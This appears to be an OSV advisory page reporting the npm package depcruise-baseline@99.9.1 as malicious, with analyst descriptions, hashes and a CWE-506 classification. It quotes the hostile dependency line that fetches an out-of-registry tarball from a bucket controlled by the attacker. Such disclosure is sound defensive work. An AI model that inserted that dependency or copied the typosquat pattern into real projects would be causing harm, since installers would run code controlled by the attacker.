MAL-2026-14053

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/depcruise-baseline/MAL-2026-14053.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-14053
Published
2026-08-15T14:35:33Z
Modified
2026-08-15T19:00:11.340453957Z
Summary
Malicious code in depcruise-baseline (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (91cc3a6ca908fc8beff657d21068318704e4576cb3778c360036ab5bfef4e56c)

depcruise-baseline@99.9.1 has a name resembling dependency-cruiser/depcruise but ships an empty index.js and declares its sole runtime dependency as a direct https:// tarball URL rather than a registry package: "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.7.4.tgz". On npm install, npm downloads and installs that tarball as a transitive dependency, so whoever controls the ltidi.storage.googleapis.com bucket controls arbitrary code that runs on the installer via that dependency's require graph and lifecycle hooks. The package has no functional code of its own; its only effect is to pull code from an author-controlled, out-of-registry location into the installer's dependency tree.

Source: ossf-package-analysis (446d5f8b4c581782feffc22437e24c36313ac56e648162a5f80e21eee9e9f083)

The OpenSSF Package Analysis project identified 'depcruise-baseline' @ 99.9.1 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.
Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-08-15T14:41:48.171472033Z",
            "sha256": "446d5f8b4c581782feffc22437e24c36313ac56e648162a5f80e21eee9e9f083",
            "versions": [
                "99.9.1"
            ],
            "source": "ossf-package-analysis",
            "modified_time": "2026-08-15T14:35:33Z"
        },
        {
            "id": "IN-MAL-2026-017978",
            "import_time": "2026-08-15T18:45:40.659038232Z",
            "sha256": "91cc3a6ca908fc8beff657d21068318704e4576cb3778c360036ab5bfef4e56c",
            "modified_time": "2026-08-15T18:11:56Z",
            "source": "amazon-inspector",
            "versions": [
                "99.9.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / depcruise-baseline

Package

Affected ranges

Affected versions

99.*
99.9.1

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "tlsh": "d9e072304e6166334ec600f28c6a655bf3b08e4f4408bc0c5aef082c818dab328fa25d",
            "sha256": "d25a85550bc8903fa9a15c9221824c238a80800f1ccdc6a8be2c6e5373167b25"
        }
    ],
    "package_integrity": [
        {
            "filename": "depcruise-baseline-99.9.1.tgz",
            "hashes": {
                "sha1": "0692ae86181683f160e1267dccac320c41943932",
                "sha512_sri": "sha512-sPOwvpWfjL7NFGvbUhtboyKkizWFhV5ZYYJdnomJBApmTlwbf+32251B3QaQNDOb3Z/zWHQV7gOL0BC7K+6CSg=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/depcruise-baseline/MAL-2026-14053.json"